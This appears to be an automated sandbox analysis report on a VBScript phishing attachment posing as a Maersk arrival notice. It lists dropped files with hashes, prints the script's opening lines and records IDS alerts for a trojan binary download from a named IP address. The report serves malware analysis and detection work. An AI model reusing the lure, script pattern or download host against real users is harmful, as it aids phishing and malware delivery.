Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..\................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\zh-CN\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17656
Entropy (8bit):	6.733291877874785
Encrypted:	false
SSDEEP:	384:7rqCQZqVz9dMIVWS8/WdRDBRJtEwhl95L7:7r/SqVxdMIe4R1P9z3
MD5:	ECA0F1F0613ADC6AB3AD41A4231644DA
SHA1:	C9C6182754056742A007C5307A9CAF12C7465F52
SHA-256:	C32E60C50963BA642B2B147A4ADB208338DDA9AB6A5F7220C8845950D72F7BAB
SHA-512:	839F96B24E905B93714DA47393D1BC215A2B2082AAD3B94290A4E377BCE865F14409B020F20D6FA3318CFBA90CB60227F856C51E4F1E452C4A578AD03FB50EA9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!........."...............................................@......51....@.......................................... ..l............$... ...........................................................................................rdata..p...........................@..@.rsrc...l.... ... ..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$.......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\zh-TW\MpAsDesc.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	30968
Entropy (8bit):	6.719830669777869
Encrypted:	false
SSDEEP:	384:7rksWFniIX+jOQ8Dr+8I4LquLXyAC4VWgQWhRDBRJdhl959:7rdWt/u0+iXyeFPR1Pdz9
MD5:	72632B8E416A153787D2D010D6C374E0
SHA1:	28134A431ECEE99FCEFF1D9D503808457ABF40A4
SHA-256:	CE2B21F5F25E574ED7B5FC7C381B82A46274C69A803393183E03773404B9C384
SHA-512:	7499B5AA00810FDF184E81F02D69132AC325F07D232EEA180B01E535A491691A810DC7FA0829F53CE37318FC6E1C2FCDC510482D2DE2DDB8D75577C9B6A8FDF5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.........V.......................................................z....@.......................................... ...R...........X... ..............8............................................................................rdata..............................@..@.rsrc....`... ...T..................@..@.............I.........T...8...8........I.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....(..X....rsrc$02.... ......d...!Z...!.4@e_/x!......I.........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\zh-TW\MpEvMsg.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	33000
Entropy (8bit):	6.023771935037824
Encrypted:	false
SSDEEP:	384:7rXJLCupmD5b4o0NyRjNfK2FswABW+BWvRDBRJsCwmEy4lGswqW3:7r5LDpmD5b4ANNC2FswAP8R1PsHy5l
MD5:	3B15F377EF6F4A43466F4D8CA2ADAC8A
SHA1:	8651157BF4F3E74E05F74D58D7CECCA4DA815A3D
SHA-256:	322B9C5DE528180BDBF2F8E0BDEAA724779BFEB4A1A84F30875FFB2CD4BB7F5E
SHA-512:	49121C8D00DC2BB1D09552571397191C846CD642210173E1A2D4D719C7B9192FE0A819A1A6BCD658FDC75B20E4CBCB127F98E2E1C204358E6E107748ADD6ECC9
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!.........^...................................................... Q....@.......................................... ...[...........`... ..............8............................................................................rdata..............................@..@.rsrc....`... ...\..................@..@............]..........T...8...8.......]..........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..8....rsrc$02.... ..._<.....5..\Z2........~..4]..........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\zh-TW\ProtectionManagement.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	48360
Entropy (8bit):	4.9568699836352135
Encrypted:	false
SSDEEP:	768:7r8EQtOO2QjiTzU1+6Xe4pbGZ4QXTQ38YiRebpR1PIX7M:UEQtgKzXGZTXDebpHPIg
MD5:	5EEAFAC8017831BED41402B0CFB7CD1A
SHA1:	BE0944232905442C665A0A02CDFD5C7976DFF564
SHA-256:	AC5968C53994D55E2FBC20A5BA9DF19F9A6B7F3619E56E859BC9A85E7ED3CEDF
SHA-512:	042E697330D66B2B64C99C67E36985A84B19478EC052E5750B3993245742D59AC0179FFA61CC7B589979DDD95BFA20CE6695EF15C49D48686F388ADF470E3809
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L..................!......................................................................@.......................................... ..\................ ..............8............................................................................rdata..............................@..@.rsrc........ ......................@..@............l...........T...8...8.......l...........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....%..H....rsrc$02.... ...=..E.......'G.:3..t.E....R<l...........................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\zh-TW\mpuxagent.dll.mui Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-77b29277.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17656
Entropy (8bit):	6.73744786198911
Encrypted:	false
SSDEEP:	192:7rKDaSgupCqx6tqyIs+jRXp8sescWS8/WUxjB1RDBQABJWLxOk9qnajR5NO1:7rKDadx+1uOcWS8/WURDBRJuxhl95NO1
MD5:	9FD7C75F65C5AB7CD0379337ACE6777D
SHA1:	C805A03CD509E6A0C9C48E61DB5D8E73AEB26E17
SHA-256:	4D4D6B443BF0C29D97517763702B24229E0656312D1B3810104B60B3CE4A026C
SHA-512:	8296C63C3BE6C239986D9E9CA73A0948C345FDEDFD50D01B41DA7134E3AFF13836E00970A6FDEF420A0BBA8FC66F6E4330F1B63F9BEAE3871A277ED26463EF86
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........k=.].S.].S.].S.....\.S...Q.\.S.Rich].S.........PE..L....KVa...........!........."...............................................@............@.......................................... ..H............$... ...........................................................................................rdata..p...........................@..@.rsrc...H.... ... ..................@..@.............KVa........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01.....$.......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\1.1.18500.10_to_1.1.18600.4_mpengine.dll._p Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe
File Type:	data
Category:	dropped
Size (bytes):	2651471
Entropy (8bit):	7.999536872421069
Encrypted:	true
SSDEEP:	49152:xATHbjm/iIcfAPkDFdv14M/XGgXqzwoDXK0wo2Ufj8BYuMmLNaCvruHEmWU:xgbHIvq/vlPGgap60PJ8TJaGrMOU
MD5:	4F33048E758419FD0617C59C81DB37AE
SHA1:	8EA87DF1CE4280B0DDD906806525F5B2548A7842
SHA-256:	02AAC7555B68F3A00D6A8F4FFDBC410D065D045EF987FE8386744BC63F126D22
SHA-512:	5A1192F73653AE0C9B66844DD3BC18A1381C50DE15569DCF00ACB0140931CC1DD8B00CA715372031FE64C259D6789ACD32203B3D76012899ECB3010303FAD91B
Malicious:	false
Preview:	PA19......da(\|f..b...h ..cI....(j!.n.\|...w.p...!..D..=.......""H..;%.P.#.Q.....Tm.Rth.(Za.%...Z.;...."....................}...5/2-....{0Il....{..no...~o^w...................q....{...o...._.}qwz..l.;...&.z...{..n.[.n......[oN......6.MG.@n.O...$..m.K.a.....H..........(..!.P......_./@ $.1....Y.......6.....;Y..\.u...`W.G .d.e....XG+)$A.r$......H..<....Jf. )..L 0r.mc..n(.K.e @n8.-.A.2Gw..,...lld.32..bs.6....Q.....cj..4.o....L.<21....&r@AInLb...%.......9..tp.$'Q..r.S..o.9...e].....hr.W...,CAo/I......~....z.H........o.$.}...........................f..f.........;.9.w.9...3..r.2.6.2w.....]..T%..I..W.TR.2.47.Q!...,...ie..$......,M.....Ah..2....P.. ......'y..S}.A.M.....2..U.u.}.A.Q..Km.q.\,..eUQ..0.[G.......]A.y:.-....p..5.c..^._.=a.I^s7..~.......S..\...;.$,8.e]9.].r9=a.:..~3 '...&.x.{.)....L.G5.9.0...Bk....2...5.#]...^iM.z@f.....f.n.....Z.{.[%-.}.S]W]..b..$...g}...nM..e....L.V..D+[......?.~=.....6+..S..R......J..O.r.....rC....Vo..+.J>....

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\1.349.0.0_to_1.351.0.0_mpasbase.vdm._p Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe
File Type:	data
Category:	dropped
Size (bytes):	6947288
Entropy (8bit):	7.998652520745969
Encrypted:	true
SSDEEP:	196608:Z6h8S1WVWjjc7Wf7zlW0qg2eUCJj6oZT32FBN6DIz:M+S1q7S7BWvMzJxBYHz
MD5:	46F037977005B7E9F8711C1CE7245C6B
SHA1:	B04BB6DE0F9F5A2B12C52124AD514D324EF3B616
SHA-256:	3D38C95836DB5540D4354BDA13A83091BF144A907A831604898D9F864126A4D0
SHA-512:	8D84FDCE9A81422A10AA1CC6B450EEA1E593F16DBF57D00A313C3AA9B03BB41F6A94FF8D4739C1ED79B3ED6F1CBF203F455BCCE6654C103BB5294599E47CDC16
Malicious:	false
Preview:	MPSP..j.....8..x..]u\.O._:D$$.E0.AEQQLJ......T..y..n.DA.1PT.n1...nL...;..{.{..q............&..\|."S....J....W..TR..)W..[5J..!..&...e...=...Y.$mdz..R.V.".FQ.....iI.ljk.....!J.Sem...Q>.....+T.6..y..\W.u...P../..=.2Mox...~..k.n...........V....O3U....wS%6....D.2)NC..q!..2.-J..h=~i.p...DF4.&#.x......54.z.\|.(W..Li..`2.R?.^W2.2.kfB.$d..3..(>..iJ...9.$..J..H.dB...LcmU.:..U.....Ua...H.FS..yE...E;..`..P#..M.!.j..6....M..Z.......C...@.<..Kj..T.......mU...2.D.C.....PG.&.)9.M..AU.......LM;fm={..n....!J.SW74.......jS.h-..J9....I.%'.c.....t..(.....aQ..X..L.;.....k.i..>N.!.i..y.X.2..g...j.,=.>..7m..A....9@........5.J......Kw..0W..r2.)...h...(i>.&>A0...`D.c...).3.mL......;.&..6......)...E....)J..?K..%..;..D]..(S.yx.g.B]....D........5..5...L.+Y.N..R3..z.s.....5H..Y.....$../o.$....(.fx-/.";.no.M...vn...l..p.f.*.......X.;W..90..A...kH6^C.u..l...6.....:.P......\|.F.k.(..t.....3s..iT...;%.e.D..'m.e.r..YP......^1,...........2O..,`........IQ<K.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe
File Type:	data
Category:	dropped
Size (bytes):	5295896
Entropy (8bit):	7.997749364950445
Encrypted:	true
SSDEEP:	98304:+3t2My1jJFqD1nlxmI5zN8KGixmH8l2snrho+qico1hSWmnSEOR69MaKJD:+92M8DqTx/dN81iUHooKcofHDZEMaKJD
MD5:	F2E9F2343E044B331ECAF82302F5EC4B
SHA1:	049E866B3C7385DD7B00BBEC39453C30B8D29C28
SHA-256:	77AF289327742CC4F520092AA6429A5B829E24F40653DF71D00E31EFF9F3737F
SHA-512:	080509E98915BE390AE6A1ABA880248E98DE10D77AF107FB266DC34CECD43EED9CE77F53C6568C20FA1222DBA1D3FDB79E820656C0B28E1316DA93500C580A79
Malicious:	false
Preview:	MPSP..P..Au.[.Aex.l..xTW.6.I ......'..C\p.Dq.....<..!..Cp.BK..H.B..w.s2....}.{]o.s.......j.)m.e._....N.L.,...:......!..g.UN.sH.t../...\|6F.F.C.f....d..N./.2^.bc..)..6...F![...BJ&.g\....%....f5.r.:...L..$..L6&.,.v=.Me..F...lF.Ou;.C....R..3.).....G...,..../..f.7U..o.2....VA..OV.7r.\|.......M?......eS$K...w.ic......y^S..&S.e.J..3..`2.y..4...iT.3..+mL(W'....L...&..&..1MI_J..\|...f..eZ..dZ{&.i.n...e.s.X..).i..th...._M...f..mLgc...3..n.C....25.5=X]..8}.k.!YR..8{>...u...`H.c'.w.K.sxN........z.0.......MN..m.lk........&4..zY....?..O..@f..j.@...i ..}..jH..tf5ekb.........^...T.4...m.c[.ZY....YZ.l.T..u.....g1..~.eV. F....d.o....M<.5L7..AOl.+......D`l...hO.'..X..;.x...=q....zS..c".J.....1D.s...(1T..`zc...q...Q.74..I.ug.(.0..g.D;1..Ty..3.....t.}......a...`.D..I.`"1..L7.`....A.p.............g..M..........J.../.6..._..-e.i.h.z.J...ALw..[...3d...iLo.)..$.?Nk..,a...V.++..v.-I.T~..M..'1}qj.,.....O.......X..3_.p...\|z6.pm.........+.).,....^.j.h...d4..D..[,.

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	803176
Entropy (8bit):	6.37118649960636
Encrypted:	false
SSDEEP:	24576:Ghj1QlBYDgtUUvie3n+pB3+ojRlcD1VyZTFXk:GhpQlBHtBYla1VyZpU
MD5:	01F92DC7A766FF783AE7AF40FD0334FB
SHA1:	45D7B8E98E22F939ED0083FE31204CAA9A72FA76
SHA-256:	FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
SHA-512:	BEA5F3D7FB0984C4A71720F25644CE3151FCDC95586E1E2FFE804D04567AAF30D8678608110E241C7DDF908F94882EDDD84A994573B0C808D1C064F0E135A583
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..#...#...#..EV...#...Q...#...Q...#...Q...#...Q...#...#..."..EV..#..EVN..#..EV...#..Rich.#..........PE..d.....P.........."......`....................@.............................0.......-....`.......... .......................................t..d....... ........D... ..h!... ......d...p.......................(......8...........0................................text...2R.......`.................. ..`.rdata.......p... ...p..............@..@.data..../....... ..................@....pdata...D.......P..................@..@.rsrc... ...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpasbase.vdm Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	53072304
Entropy (8bit):	7.997563930648501
Encrypted:	true
SSDEEP:	1572864:P0U1SslLDBQpTRKb0o76I0RUgRS2uc62zNWPy:P0UplL2tRW0aV0RpS2lTey
MD5:	0157CF1D00DB2F06270440CED26AD2DA
SHA1:	E0DA67E235AF6B8DDBA9736504E7638BFF4DB4B0
SHA-256:	15C43FFD2F73BA5E6A0E0A3B845A6FD61EE9E12220C0D98CBDB9E59D6E188914
SHA-512:	0264329D824734BC9BFE3129E4653E5293EFC96555EE98909DD19B37A010747C6368247784972AE478DBC16EF5E031FF99A283CF371F21278DBCE9E94DABAAC5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....<_a.........." ..........)...............................................).......)...`.......................................................... ....)...........)..!...........................................................................................rdata..p...........................@..@.rsrc.....).. ....).................@..@.....<_a........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ...)..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpasdlta.vdm Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	532424
Entropy (8bit):	7.994603501321625
Encrypted:	true
SSDEEP:	12288:kiBHg02Wvkzz4+5sHiYQ9dwv6FWJW5X8IEwKMTP9zFxjcwBq:TBH/9UvWdodwOWg5X2YPtFFcwBq
MD5:	8C47943BF9C9E2A26CC6F2A22DE036E1
SHA1:	77886B25B6CC2B5CBA7CB22A29436CBA10C9758E
SHA-256:	ACA058E090B0DA79C2591F3AC13C767E9ACB32BE281F476BB4A14732FF49C44F
SHA-512:	648B4F1A537C4C75218E093737338A89653513D9BB8D3A726F5EDF8D4435AC1C2607C066CBE9095A4498DC728F060E98695C73BBB77BC53A19794952BD9930AF
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....da.........." ......................................................... ............`.......................................................... ..`................!...........................................................................................rdata..p...........................@..@.rsrc...`.... ......................@..@.....da........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavbase.vdm Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\MpSigStub.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	55848880
Entropy (8bit):	7.995585481148423
Encrypted:	true
SSDEEP:	1572864:iy6w1liQqicAsNBasl5IY/hOO0S7WGB9F9L4hxZB:B6uiQqiTE8kIYJn+wFZ4XB
MD5:	7E2B83A39CC26B2B617F404A89B6661C
SHA1:	198F9D59A90993247182EE11AE33AB52E5011C44
SHA-256:	8ED02ED1D817FA7B68466F11F55A2289D82BDD22A360246624BA0F9220D17EE3
SHA-512:	BF29A223DFF577DB8967DBEA610DC6DB2D6C0152A896E8BCC851EB67E84AF5367E4A01AC6110554C2813E974EBA9B8C04C2EB03422DCCDE00B1FA8D7F629C55F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....<_a.........." ..........T..............................................0T.......T...`.......................................................... ..@.T...........T..!...........................................................................................rdata..p...........................@..@.rsrc...@.T.. ....T.................@..@.....<_a........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... ....T..rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\84D825BA-CD45-4B8F-AE8C-7C51ADA28E10\mpavdlta.vdm Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-25cd2963.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	modified
Size (bytes):	178632
Entropy (8bit):	7.984129414162503
Encrypted:	false
SSDEEP:	3072:wUrFFNVso80aGPTzhqgzyi0NndyIw2YIj8nQaZUcjO4MFdzt:RNVsPaQi8kIDj8nQkUcedB
MD5:	E3D07997A630F178ACE80146C52F4D2B
SHA1:	66F419B28CE3DFFF65570D94AAE39A4B4D26A8A0
SHA-256:	383453DF3129609A67A67C482D2077A622CC5E74DBD76D2D88A53DF39D32A431
SHA-512:	F3EC034CE1851B3DE393447191867381C17DD6CBEE4C4B4B2002CA83BAFB3C83562DAA7F620600590B760575B3BBB514A003E6DCC24FC023FA105A738ED8A7FC
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<..R...R...R......R..P...R.Rich..R.PE..d....da.........." ......................................................................`.......................................................... ..H................!...........................................................................................rdata..p...........................@..@.rsrc...H.... ......................@..@.....da........T........................rdata......T....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02............................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\MpSigStub.log Download File
Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\21DBFFC8-FB6E-40AB-AA7A-82FB807B2522\MpSigStub.exe
File Type:	data
Category:	modified
Size (bytes):	69108
Entropy (8bit):	3.1477870740618745
Encrypted:	false
SSDEEP:	768:XPmkYR6PjO6283SLqS/24Dqzwmt7Nkrm0InnxKUs:ezRAC6fSlzckrlInnvs
MD5:	4A1699C7D111CC55188A7562367A190C
SHA1:	F411CC7488A96E8F111E42CBFFCBBA75BC63E9DD
SHA-256:	75D14AA7E64165CC603531039EE64BD8C7441A7FA6DDEAE039785D9FADC4FEC1
SHA-512:	0212EE03ED5078D28DCB31840724E238EAD21239F5F222179FB948EB62FC303B1120958480E707BECB1F2127AD0AD3FFED5B20EA519623967A8FBD7DF1C19A4A
Malicious:	false
Preview:	-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....S.t.a.r.t. .t.i.m.e.:. .2.0.2.1.-.1.0.-.1.2. .0.3.:.4.6.:.0.9.Z.....P.r.o.c.e.s.s.:. .1.1.a.8...1.d.7.b.f.1.b.b.1.3.6.c.0.9.4.....C.o.m.m.a.n.d.:. ./.s.t.u.b. .1...1...1.8.5.0.0...1.0. ./.p.a.y.l.o.a.d. .4...1.8...2.1.0.9...6. ./.p.r.o.g.r.a.m. .C.:.\.W.i.n.d.o.w.s.\.S.E.R.V.I.C.~.1.\.N.E.T.W.O.R.~.1.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.m.p.a.m.-.7.7.b.2.9.2.7.7...e.x.e.....A.d.m.i.n.i.s.t.r.a.t.o.r.:. .n.o.....V.e.r.s.i.o.n.:. .1...1...1.8.5.0.0...1.0.........=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=. .P.r.o.d.u.c.t.S.e.a.r.c.h. .=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=.=......... . . . . . . . . . . . . . . .M.i.c.r.o.s.o.f.t. .W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r. .(.R.S.1.+.).:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..... . . . . . . .S.t.a.t.u.s.:. .A.c.t.i.

Static File Info

General
File type:	ASCII text, with CRLF line terminators
Entropy (8bit):	3.9982283274649064
TrID:	Visual Basic Script (13500/0) 100.00%
File name:	Arrival_Notice-AutonotificationimportsEUR-sealandmaersk.com_october2021.vbs
File size:	215177
MD5:	3db65d6cb8c8f1b0e97dfc293d28e295
SHA1:	c3fb70c3613ccdcdac2e4a12df17551ab93a88a4
SHA256:	6394c4e126b8ef4cf8e66d43a54cfd42fd86b3003292f621f0ca427bc12051d8
SHA512:	ad8fbef4974d2ad526d0a1fdd312d6f08faaca87b04e7e096d5af44aba912ab165e6253f587e3a841e6f48041015f2bf4b5f9b849ded66c2b07a712d448b209a
SSDEEP:	1536:iuAsWuLukVVDrwlapE/kowuDrxPQh2QYVGtVNJ8r9PRloka7N+EcSpUJ7hSiiMLT:iNgEgRnYUZ+LSQT+lez
File Content Preview:	Dim objshell, objExec, strLine..set objShell = CreateObject("Wscript.Shell")....Set objExec = objShell.Exec("ipconfig.exe /release")..Do Until objExec.StdOut.AtEndOfStream.. strLine = strLine & objExec.StdOut.ReadLine()..Loop......if InStr(1,strLine ,

File Icon


Icon Hash:	e8d69ece869a9ec4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
10/12/21-04:40:11.434409	TCP	2018752	ET TROJAN Generic .bin download from Dotted Quad	49788	80	192.168.11.20	178.32.63.50
10/12/21-04:40:13.273529	UDP	254	DNS SPOOF query response with TTL of 1 min. and no authority	53	63817	1.1.1.1	192.168.11.20

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 12, 2021 04:40:11.416676044 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.433799028 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.434051037 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.434408903 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.504209995 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.514601946 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.514667988 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.514717102 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.514764071 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.514825106 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.514878035 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.514889002 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.514898062 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532079935 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532145023 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532191992 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532238007 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532283068 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532306910 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532330036 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532357931 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532368898 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532380104 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532387972 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532428026 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.532491922 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532531023 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.532646894 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.549460888 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549542904 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549592018 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549654961 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549659967 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.549701929 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549710035 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.549766064 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549820900 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.549837112 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549860954 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.549930096 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.549973965 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.549978018 CEST	80	49788	178.32.63.50	192.168.11.20
Oct 12, 2021 04:40:11.550023079 CEST	49788	80	192.168.11.20	178.32.63.50
Oct 12, 2021 04:40:11.550024033 CEST	80	49788	178.32.63.50	192.168.11.20
